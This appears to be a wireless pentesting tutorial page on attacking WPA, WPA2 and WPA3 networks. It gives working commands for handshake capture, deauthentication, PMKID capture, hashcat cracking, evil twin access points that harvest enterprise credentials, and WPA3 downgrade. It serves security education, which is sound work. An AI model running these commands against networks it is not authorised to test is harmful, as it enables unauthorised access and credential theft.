Home > Network Pentesting

WPA/WPA2/WPA3 Attacks

WPA, WPA2, and WPA3 are the core security standards that protect modern Wi-Fi networks. Each generation introduces stronger encryption and authentication methods, but each also exposes different weaknesses and attack surfaces that pentesters can exploit. Understanding how these protocols operate and how to attack them is essential for effective wireless pentesting.

How WPA/WPA2/WPA3 Work

All three standards use encryption and key exchange mechanisms to secure wireless data:

  • WPA uses TKIP (older, weaker).

  • WPA2 uses CCMP/AES (modern standard).

  • WPA3 uses SAE/Dragonfly (resistant to offline cracking).

The strength of these protections depends heavily on implementation and password quality.

WPA Attacks (TKIP-Based)

WPA is an outdated protocol that still appears in older routers and IoT devices.

Common Weaknesses

  • Uses TKIP, which is vulnerable

  • Supports replay attacks

  • Allows limited packet injection

  • Still vulnerable to dictionary attacks

Capturing WPA Handshake

sudo airodump-ng wlan0mon -c <channel> --bssid <AP_MAC> -w capture

Forcing Reconnection (Handshake Capture)

sudo aireplay-ng --deauth 10 -a <AP_MAC> wlan0mon

Once captured, the handshake is cracked offline just like WPA2.

Cracking WPA

hashcat -m 2500 capture.hccap wordlist.txt

WPA is insecure and should be treated similarly to WPA2-PSK, but with more protocol weaknesses.

WPA2 Attacks (PSK-Based)

WPA2-PSK is the most common security standard in homes and small networks.
Its main weakness is password cracking after handshake capture.

Capturing WPA2 Handshake

sudo airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

Forcing a Handshake

sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon

Verifying Handshake

sudo aircrack-ng capture.cap

Cracking WPA2 Passwords (Offline)

Convert to Hashcat format:

sudo hcxpcapngtool -o hash.hc22000 capture.cap

Crack:

hashcat -m 22000 hash.hc22000 wordlist.txt

WPA2-PSK security depends entirely on the strength of the passphrase.

PMKID-Based WPA2 Attacks

Certain routers leak a PMKID without needing a client to connect, making handshake capture easier.

Capturing PMKID

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

Extracting PMKID

sudo hcxpcapngtool -o pmkid.txt pmkid.pcapng

Cracking PMKID

hashcat -m 16800 pmkid.txt wordlist.txt

PMKID attacks are effective against networks with no clients.

WPA2-Enterprise Attacks

WPA2-Enterprise uses RADIUS and EAP authentication.
It is secure if configured properly, but misconfigurations allow credential harvesting.

Step: Create an Evil Twin AP

Use hostapd-wpe or Bettercap to impersonate the real AP.

Starting Evil Twin with hostapd-wpe

sudo hostapd-wpe hostapd-wpe.conf

Victims connecting through this fake AP send:

  • Username

  • NTLM challenge–response

  • EAP credentials

If certificate warnings are ignored, attackers gather authentication data.

Credentials Captured Can Be:

  • Cleartext

  • NTLM hashes

  • MSCHAPv2 data

These allow offline cracking or lateral attacks.

WPA3 Attacks

WPA3 uses SAE (Simultaneous Authentication of Equals), resistant to offline cracking.
However, WPA3 attacks target implementation flaws or configuration weaknesses.

WPA3 Weak Points

  • Downgrade to WPA2 (Transition Mode)

  • SAE side-channel leaks (Dragonblood vulnerabilities)

  • Misconfigured PMF

  • Evil Twin opportunities

Downgrade Attack (WPA3 → WPA2)

If WPA3 and WPA2 are both allowed:

  1. Force client to connect using WPA2

  2. Capture WPA2 handshake

  3. Perform offline cracking

Testing Downgrade Behavior

sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon

Clients may rejoin using WPA2 if transition mode is enabled.

Dragonblood Attacks

Early WPA3 implementations leaked timing info and side-channel data.
These issues are patched in modern firmware, but older devices remain vulnerable.

WPA3-Personal vs WPA3-Enterprise

  • WPA3-Personal uses SAE

  • WPA3-Enterprise supports 192-bit mode

Enterprise mode is extremely resistant to attacks, unless EAP configuration errors exist.

Protected Management Frames (PMF)

PMF (802.11w) secures:

  • Deauth frames

  • Disassociation frames

PMF Enabled Behavior

  • Deauth attacks do not work

  • Handshake forcing becomes difficult

  • Evil Twin attacks become harder

Pentesters must use:

  • PMKID attacks

  • Downgrade attempts

  • Social engineering

  • Evil Twin with client-side misconfigurations

Evil Twin Attacks Across WPA Families

Evil Twin attacks remain effective when:

  • Victims ignore certificate warnings (WPA2-Enterprise)

  • PMF is disabled

  • Auto-connect behavior is enabled

  • Signal strength is stronger

Tools for Evil Twin:

sudo airbase-ng -e "TargetSSID" -c <channel> wlan0mon

or using Bettercap:

wifi.ap on

Evil Twin remains one of the most effective wireless attack techniques.

Why WPA/WPA2/WPA3 Attacks Matter

Wireless security depends heavily on:

  • Password strength

  • Configuration

  • Client behavior

  • Router implementation

Pentesters use these attacks to:

  • Evaluate password resilience

  • Identify downgrade vulnerabilities

  • Assess certificate validation behavior

  • Test user awareness

  • Reveal insecure Enterprise deployments

Each standard has unique weaknesses that must be understood before attempting exploitation.

Intel Dump

  • WPA attacks rely on handshake + offline cracking

  • WPA2 is vulnerable via PSK capture, PMKID, and weak passwords

  • WPA2-Enterprise vulnerable via Evil Twin and misconfigured EAP

  • WPA3 vulnerable via downgrade and early SAE flaws

  • PMF protects against deauth but not against misconfigured clients

HOME LEARN COMMUNITY DASHBOARD